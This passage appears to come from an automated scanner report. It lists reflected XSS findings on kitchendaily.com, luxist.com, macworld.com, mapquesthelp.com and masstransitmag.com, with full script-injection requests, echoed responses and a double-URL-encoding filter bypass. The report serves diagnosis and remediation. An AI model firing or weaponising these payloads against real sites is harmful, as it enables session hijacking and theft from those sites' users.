GET /chefs/?bc258"><script>alert(1)</script>960b49903a6=1 HTTP/1.1 Host: www.kitchendaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.574. http://www.kitchendaily.com/recipes/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.kitchendaily.com
Path:
/recipes/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 15c75</script><a>f0ef4344fb5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /recipes/?15c75</script><a>f0ef4344fb5=1 HTTP/1.1 Host: www.kitchendaily.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
} var s_account="timeaolfood,aolsvc"; (function(){
...[SNIP]...
1.575. http://www.luxist.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.luxist.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 50507"-alert(1)-"f0b7cb9d521 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?50507"-alert(1)-"f0b7cb9d521=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.576. http://www.luxist.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.luxist.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10976"><script>alert(1)</script>55a7c5f9e2c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?10976"><script>alert(1)</script>55a7c5f9e2c=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Luxury News from Lux ...[SNIP]... <link rel="canonical" href="http://www.luxist.com/?10976"><script>alert(1)</script>55a7c5f9e2c=1"/> ...[SNIP]...
1.577. http://www.luxist.com/2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 24317"><script>alert(1)</script>d7820b72f76 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/?24317"><script>alert(1)</script>d7820b72f76=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml xmlns:og="http://opengraphprotocol.o ...[SNIP]... <link rel="canonical" href="http://www.luxist.com/2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/?24317"><script>alert(1)</script>d7820b72f76=1"/> ...[SNIP]...
1.578. http://www.luxist.com/2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4ba8"-alert(1)-"63a6b2d9e21 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/louis-vuitton-voyagez-tambour-automatic-chronograph-tachometer-w/?b4ba8"-alert(1)-"63a6b2d9e21=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.579. http://www.luxist.com/2011/02/06/oakridge-drive-estate-of-the-day/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.luxist.com
Path:
/2011/02/06/oakridge-drive-estate-of-the-day/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2798e"><script>alert(1)</script>7df4d147f33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/oakridge-drive-estate-of-the-day/?2798e"><script>alert(1)</script>7df4d147f33=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml xmlns:og="http://opengraphprotocol.o ...[SNIP]... <link rel="canonical" href="http://www.luxist.com/2011/02/06/oakridge-drive-estate-of-the-day/?2798e"><script>alert(1)</script>7df4d147f33=1"/> ...[SNIP]...
1.580. http://www.luxist.com/2011/02/06/oakridge-drive-estate-of-the-day/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.luxist.com
Path:
/2011/02/06/oakridge-drive-estate-of-the-day/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6720b"-alert(1)-"4621b68b7a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/oakridge-drive-estate-of-the-day/?6720b"-alert(1)-"4621b68b7a=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml xmlns:og="http://opengraphprotocol.o ...[SNIP]... "; s_265.linkInternalFilters="javascript:,luxist.com"; s_265.mmxgo = true; s_265.prop1="Lifestyle"; s_265.prop2="Post"; s_265.prop12="http://www.luxist.com/2011/02/06/oakridge-drive-estate-of-the-day/?6720b"-alert(1)-"4621b68b7a=1"; s_265.prop16="Oakridge Drive, Estate of the Day"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="dtc"; s_265.prop22="14"; s_265.prop9="bsd:19828098";
var s_code ...[SNIP]...
1.581. http://www.luxist.com/2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 71d32"-alert(1)-"3f416f5c377 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/?71d32"-alert(1)-"3f416f5c377=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml xmlns:og="http://opengraphprotocol.o ...[SNIP]... s="javascript:,luxist.com"; s_265.mmxgo = true; s_265.prop1="Lifestyle"; s_265.prop2="Post"; s_265.prop12="http://www.luxist.com/2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/?71d32"-alert(1)-"3f416f5c377=1"; s_265.prop16="Rare Batman Pages Saved From Trash Could Sell For Thousands"; s_265.prop17=""; s_265.prop18=""; s_265.prop19=""; s_265.prop20=""; s_265.prop21="dtc"; s_265.prop22="14"; s_265.prop9=" ...[SNIP]...
1.582. http://www.luxist.com/2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/ [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b178a"><script>alert(1)</script>c1c09125490 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2011/02/06/rare-batman-pages-saved-from-trash-could-sell-for-thousands/?b178a"><script>alert(1)</script>c1c09125490=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 78a25%253cscript%253ealert%25281%2529%253c%252fscript%253efa58376a4a1 was submitted in the REST URL parameter 2. This input was echoed as 78a25<script>alert(1)</script>fa58376a4a1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/CelebrityRealEstate78a25%253cscript%253ealert%25281%2529%253c%252fscript%253efa58376a4a1/ HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ff429"-alert(1)-"985d303e38f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/CelebrityRealEstateff429"-alert(1)-"985d303e38f/ HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload db4a6"><a>69112ad71cf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tag/CelebrityRealEstatedb4a6"><a>69112ad71cf/ HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>CelebrityRealEstated ...[SNIP]... <link rel="canonical" href="http://www.luxist.com/tag/CelebrityRealEstatedb4a6"><a>69112ad71cf/"/> ...[SNIP]...
1.586. http://www.luxist.com/tag/CelebrityRealEstate/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.luxist.com
Path:
/tag/CelebrityRealEstate/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2df48"-alert(1)-"b347019b714 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/CelebrityRealEstate/?2df48"-alert(1)-"b347019b714=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.587. http://www.luxist.com/tag/CelebrityRealEstate/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.luxist.com
Path:
/tag/CelebrityRealEstate/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79878"><script>alert(1)</script>aa82c4ce43a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/CelebrityRealEstate/?79878"><script>alert(1)</script>aa82c4ce43a=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d6ce"><a>a5449adeaf1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tag/condo+auction3d6ce"><a>a5449adeaf1/ HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 7fe77%253cscript%253ealert%25281%2529%253c%252fscript%253e97357d9c408 was submitted in the REST URL parameter 2. This input was echoed as 7fe77<script>alert(1)</script>97357d9c408 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/condo+auction7fe77%253cscript%253ealert%25281%2529%253c%252fscript%253e97357d9c408/ HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 28cef"-alert(1)-"fa384cc80ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/condo+auction28cef"-alert(1)-"fa384cc80ed/ HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.591. http://www.luxist.com/tag/condo+auction/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.luxist.com
Path:
/tag/condo+auction/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3548a"-alert(1)-"f1350bfa9ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/condo+auction/?3548a"-alert(1)-"f1350bfa9ff=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.592. http://www.luxist.com/tag/condo+auction/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.luxist.com
Path:
/tag/condo+auction/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba002"><script>alert(1)</script>16b93e32b8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/condo+auction/?ba002"><script>alert(1)</script>16b93e32b8=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b50a8"><a>72d449c7437 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /tag/hoteldealsb50a8"><a>72d449c7437/ HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a294d"-alert(1)-"322776735d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/hoteldealsa294d"-alert(1)-"322776735d/ HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 11a76%253cscript%253ealert%25281%2529%253c%252fscript%253e03d60e24d1f was submitted in the REST URL parameter 2. This input was echoed as 11a76<script>alert(1)</script>03d60e24d1f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /tag/hoteldeals11a76%253cscript%253ealert%25281%2529%253c%252fscript%253e03d60e24d1f/ HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <title>Hoteldeals11a76alert ...[SNIP]... <h1 class="small">hoteldeals11a76<script>alert(1)</script>03d60e24d1f</h1> ...[SNIP]...
1.596. http://www.luxist.com/tag/hoteldeals/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.luxist.com
Path:
/tag/hoteldeals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81546"-alert(1)-"0019621368a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /tag/hoteldeals/?81546"-alert(1)-"0019621368a=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
1.597. http://www.luxist.com/tag/hoteldeals/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.luxist.com
Path:
/tag/hoteldeals/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9977d"><script>alert(1)</script>da0051c4140 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /tag/hoteldeals/?9977d"><script>alert(1)</script>da0051c4140=1 HTTP/1.1 Host: www.luxist.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 3 is copied into a JavaScript rest-of-line comment. The payload ba515</script><script>alert(1)</script>9be3a85ecb5 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/157640/2011ba515</script><script>alert(1)</script>9be3a85ecb5/02/iwow_3d.html HTTP/1.1 Host: www.macworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 06 Feb 2011 20:01:44 GMT Cache-Control: max-age=60 Set-Cookie: JSESSIONID=B4274AE30D37266FC181901226A89160; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 06 Feb 2011 20:01:43 GMT Connection: close Cache-Control: no-store, no-cache Cache-Control: post-check=0, pre-check=0, false Pragma: cache differently Vary: Accept-Encoding
The value of REST URL parameter 4 is copied into a JavaScript rest-of-line comment. The payload 34dca</script><script>alert(1)</script>77e3f5cd40e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/157640/2011/0234dca</script><script>alert(1)</script>77e3f5cd40e/iwow_3d.html HTTP/1.1 Host: www.macworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Last-Modified: Sun, 06 Feb 2011 20:01:48 GMT Cache-Control: max-age=60 Set-Cookie: JSESSIONID=4F189BF818F61F951CACE024006183FD; Path=/ Content-Type: text/html;charset=UTF-8 Date: Sun, 06 Feb 2011 20:01:48 GMT Connection: close Cache-Control: no-store, no-cache Cache-Control: post-check=0, pre-check=0, false Pragma: cache differently Vary: Accept-Encoding
The value of REST URL parameter 5 is copied into a JavaScript rest-of-line comment. The payload b6373</script><script>alert(1)</script>83b2a3ae774 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /article/157640/2011/02/iwow_3d.htmlb6373</script><script>alert(1)</script>83b2a3ae774 HTTP/1.1 Host: www.macworld.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
/* Namespace RememberURI */ var RememberURI = new Object(); //RememberURI.referer = '/article/157640/2011/02/iwow_3d.htmlb6373</script><script>alert(1)</script>83b2a3ae774'; RememberURI.referer = ''; if (!RememberURI.referer.match('^/logo') && !RememberURI.referer.match('^/register')) { RememberURI.query = ''; RememberURI.referer += RememberURI.query; document. ...[SNIP]...
1.601. http://www.mapquesthelp.com/app/answers/detail/a_id/949/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.mapquesthelp.com
Path:
/app/answers/detail/a_id/949/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1ce58</script><script>alert(1)</script>3ed392e1c04 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /app/answers/detail/a_id/949/?1ce58</script><script>alert(1)</script>3ed392e1c04=1 HTTP/1.1 Host: www.mapquesthelp.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:40 GMT Server: Apache P3P: policyref="http://www.mapquesthelp.com/rnt/rnw/p3p/rnw_p3p_ref.xml",CP="CAO CURa ADMa DEVa OUR BUS IND UNI COM NAV" Cache-Control: max-age=0 Expires: -1 Pragma: no-cache Set-Cookie: cp_session=aUWl6ve2SwZIzixZlF8DwQl5wAtQcAkzpnpZuRG19Yd2kziJLr120Xfjd%7E3XrLO3ljCMJpP8AHJaHQ9EPr73F3kYC1LqfVkcEj3mtpTOw_hsYH4sw0uxS05oYlYSFqV2R1BdQURGerG2hBA07%7ElvFdWzl_HZHP6lriUS28lvFmYITxse0jyKV4yExcvLp1C1Cj3bV%7Ex1pQv0sKHozyL0dGjOkK_Jo44pF4Iap3vCJuf9IFHnwdmSGd7j6f7HcuFEOiyJHwKoYNZVzYNKNT0OiuRhyy0OLVBLgpTWC9bg2IGbtVgHGuh%7EiC%7E%7E9yvxnDyZVGp7D8upACwOg%21; path=/; httponly Content-Length: 38367 RNT-Time: D=123910 t=1297022500002628 RNT-Machine: 09 Vary: Accept-Encoding Connection: close Content-Type: text/html; charset=UTF-8
The value of the id request parameter is copied into an HTML comment. The payload 48181--><script>alert(1)</script>c11697f1d6d was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /online/article.jsp?siteSection=3&id=1358448181--><script>alert(1)</script>c11697f1d6d&pageNum=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Date: Sun, 06 Feb 2011 20:01:40 GMT Server: Apache Set-Cookie: JSESSIONID=B2A3C39806EA39C152C603DEA0EC83C6.transportation-app1; Path=/ Connection: close Content-Type: text/html;charset=ISO-8859-1 Content-Length: 33094
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32cf5"><script>alert(1)</script>38dc6ef8109 was submitted in the id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /online/article.jsp?siteSection=3&id=1358432cf5"><script>alert(1)</script>38dc6ef8109&pageNum=1 HTTP/1.1 Host: www.masstransitmag.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
